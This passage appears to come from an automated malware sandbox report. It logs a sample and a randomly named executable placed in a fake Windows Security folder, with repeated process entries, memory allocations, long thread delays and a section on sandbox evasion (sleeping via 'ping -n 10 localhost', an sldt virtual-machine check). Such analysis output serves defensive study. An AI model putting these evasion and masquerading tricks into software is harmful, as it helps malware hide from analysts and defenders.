Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Uses ping.exe to sleep

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost

Source: C:\Users\user\Desktop\OH6KO8NBy1.exe	Memory allocated: 29F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\OH6KO8NBy1.exe	Memory allocated: 1ABE0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Memory allocated: A10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Memory allocated: 1A7A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Memory allocated: 840000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Memory allocated: 1A4A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Memory allocated: 1530000 memory reserve \| memory write watch
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Memory allocated: 1AD60000 memory reserve \| memory write watch
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Memory allocated: 14F0000 memory reserve \| memory write watch
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Memory allocated: 1AF20000 memory reserve \| memory write watch
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Memory allocated: 16C0000 memory reserve \| memory write watch
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Memory allocated: 1B2A0000 memory reserve \| memory write watch
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Memory allocated: 2810000 memory reserve \| memory write watch
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Memory allocated: 1A990000 memory reserve \| memory write watch
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Memory allocated: 9C0000 memory reserve \| memory write watch
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Memory allocated: 1A5C0000 memory reserve \| memory write watch
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Memory allocated: 11B0000 memory reserve \| memory write watch
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Memory allocated: 1AEC0000 memory reserve \| memory write watch
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Memory allocated: F60000 memory reserve \| memory write watch
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Memory allocated: 1AD30000 memory reserve \| memory write watch
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Memory allocated: FD0000 memory reserve \| memory write watch
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Memory allocated: 1AAF0000 memory reserve \| memory write watch
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Memory allocated: 23C0000 memory reserve \| memory write watch
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Memory allocated: 1A620000 memory reserve \| memory write watch
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Memory allocated: CE0000 memory reserve \| memory write watch
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Memory allocated: 1A890000 memory reserve \| memory write watch

Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe

Code function: 5_2_00007FFD9BB01389 sldt word ptr [eax]

5_2_00007FFD9BB01389

Source: C:\Users\user\Desktop\OH6KO8NBy1.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\Desktop\OH6KO8NBy1.exe TID: 7500	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe TID: 7716	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe TID: 7696	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe TID: 8024	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe TID: 8012	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe TID: 3612	Thread sleep time: -30000s >= -30000s
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe TID: 980	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe TID: 3548	Thread sleep time: -30000s >= -30000s
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe TID: 7372	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe TID: 7248	Thread sleep time: -30000s >= -30000s
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe TID: 7588	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe TID: 7760	Thread sleep time: -30000s >= -30000s
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe TID: 7728	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe TID: 7768	Thread sleep time: -30000s >= -30000s
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe TID: 7816	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe TID: 2944	Thread sleep time: -30000s >= -30000s
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe TID: 2212	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe TID: 5180	Thread sleep time: -30000s >= -30000s
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe TID: 4924	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe TID: 8160	Thread sleep time: -30000s >= -30000s
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe TID: 2792	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe TID: 3612	Thread sleep time: -30000s >= -30000s
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe TID: 2044	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe TID: 4444	Thread sleep time: -30000s >= -30000s
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe TID: 4888	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\PING.EXE	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\PING.EXE	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\PING.EXE	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\PING.EXE	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\PING.EXE	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\PING.EXE	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
